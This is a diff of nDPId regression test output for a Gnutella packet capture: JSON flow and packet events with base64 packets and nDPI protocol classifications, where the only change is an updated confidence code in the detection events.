00699{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":16487,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":16487,"pkt":"\/\/\/\/\/\/\/\/CAAn5uVZCABFAADlHPgAAIARBAMKAAIPCgAC\/wCKAIoA0aFXEQKcLAoAAg8AigC7AAAgRU5GREVGRUVFSEVGRkhFSkVPREJEQUNBQ0FDQUNBQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQBg6gAATVNFREdFV0lOMTAAAAAAAAoAAxAAAA8BVaoA"} 
-00739{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":16487,"flow_last_seen":16487,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":16487,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00739{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":16487,"flow_last_seen":16487,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":16487,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":17749,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":17749,"pkt":"MzMAAAACCAAn5uVZht1gAAAAABA6\/\/6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAChQDYkwAAAAABAQgAJ+blWQ=="} 
00580{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":18297,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":157,"pkt_l4_len":103,"thread_ts_msec":18297,"pkt":"MzMAAAAMCAAn5uVZht1gDyjoAGcRBP6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAAM+dgHbABnVAhNLVNFQVJDSCAqIEhUVFAvMS4xDQpIb3N0OiBbRkYwMjo6Q106MTkwMA0KU1Q6IHVwbnA6cm9vdGRldmljZQ0KTWFuOiAic3NkcDpkaXNjb3ZlciINCk1YOiAzDQoNCg=="} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":125,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40005,"flow_last_seen":40005,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":40005,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":55708,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":40005,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":40005,"pkt":"AQBef\/\/6CAAn5uVZCABFAADK4KUAAAER3HQKAAIP7\/\/\/+tmcB2wAthOSTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogTWljcm9zb2Z0IEVkZ2UvOTkuMC4xMTUwLjMwIFdpbmRvd3MNCg0K"} 
-00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40005,"flow_last_seen":40005,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":40005,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":55708,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40005,"flow_last_seen":40005,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":40005,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":55708,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":40185,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":40185,"pkt":"AQBeAAD7CAAn5uVZCABFAABEaF8AAAERZEAKAAIP4AAA+xTpFOkAMJ6ZAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":40185,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":102,"pkt_l4_len":48,"thread_ts_msec":40185,"pkt":"MzMAAAD7CAAn5uVZht1gBGNuADARAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAAD7FOkU6QAw\/soAAAAAAAEAAAAAAAALX2dvb2dsZWNhc3QEX3RjcAVsb2NhbAAADAAB"} 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":133,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":62539,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":40232,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":40232,"pkt":"MzMAAQADCAAn5uVZht1gAihOACARAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAQAD9EsU6wAgDPv9UAAAAAEAAAAAAAAGcHVwcGV0AAABAAE="} 
-00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":62539,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":133,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":62539,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":134,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":62539,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":40232,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":40232,"pkt":"AQBeAAD8CAAn5uVZCABFAAA0pMcAAAERJ+cKAAIP4AAA\/PRLFOsAIKvR\/VAAAAABAAAAAAAABnB1cHBldAAAAQAB"} -00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":134,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":62539,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":134,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":62539,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":50435,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":40232,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":40232,"pkt":"MzMAAQADCAAn5uVZht1gAiZUACARAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAQADxQMU6wAgtlmDHwAAAAEAAAAAAAAGcHVwcGV0AAAcAAE="} -00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":50435,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
+00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":135,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":50435,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":50435,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":40232,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":40232,"pkt":"AQBeAAD8CAAn5uVZCABFAAA0pMgAAAERJ+YKAAIP4AAA\/MUDFOsAIFUwgx8AAAABAAAAAAAABnB1cHBldAAAHAAB"} 
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":50435,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":136,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":40232,"flow_last_seen":40232,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":40232,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":50435,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":40630,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":40630,"pkt":"MzMAAQADCAAn5uVZht1gAiZUACARAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAQADxQMU6wAgtlmDHwAAAAEAAAAAAAAGcHVwcGV0AAAcAAE="} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":40630,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":40630,"pkt":"MzMAAQADCAAn5uVZht1gAihOACARAf6AAAAAAAAAxQ1Rn5ak4Qj\/AgAAAAAAAAAAAAAAAQAD9EsU6wAgDPv9UAAAAAEAAAAAAAAGcHVwcGV0AAABAAE="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":40630,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":40630,"pkt":"AQBeAAD8CAAn5uVZCABFAAA0pMkAAAERJ+UKAAIP4AAA\/MUDFOsAIFUwgx8AAAABAAAAAAAABnB1cHBldAAAHAAB"} 
@@ -150,11 +150,11 @@ 00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":63234,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":63234,"pkt":"UlQAEjUCCAAn5uVZCABFAAAouwVAAIAG0BMKAAIPL5M0FcQXj3g4QcNPAGOcAlAQ+vBZpgAA"} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":63250,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":63250,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAocAAEAGiwHa+gY7CgACDzEMxBQAZJYBrKXgdGAS\/\/+SMQAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":63250,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":63250,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoLR5AAIAG4G0KAAIP2voGO8QUMQyspeB0AGSWAlAQ+vCu\/QAA"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63001,"flow_last_seen":63261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63261,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":50199,"dst_port":36728,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63000,"flow_last_seen":63261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63261,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.250.6.59","src_port":50196,"dst_port":12556,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63001,"flow_last_seen":63261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63261,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":50199,"dst_port":36728,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63000,"flow_last_seen":63261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63261,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.250.6.59","src_port":50196,"dst_port":12556,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":63297,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":63297,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAooAAEAG5kR2qA9HCgACDw9bxBUAZZABIZ4f2mAS\/\/9gyQAAAgQFtA=="} 00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":63297,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":63297,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoTFBAAIAGHIIKAAIPdqgPR8QVD1shnh\/aAGWQAlAQ+vB9lQAA"} 
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63001,"flow_last_seen":63309,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63309,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":50197,"dst_port":3931,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63001,"flow_last_seen":63309,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63309,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":50197,"dst_port":3931,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64030,"flow_last_seen":64030,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64030,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":50202,"dst_port":57648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":64030,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64030,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GZhAAIAG6a4KAAIPPe6tgMQa4TAr3W0hAAAAAIAC+vA+WAAAAgQFtAEDAwgBAQQC"} 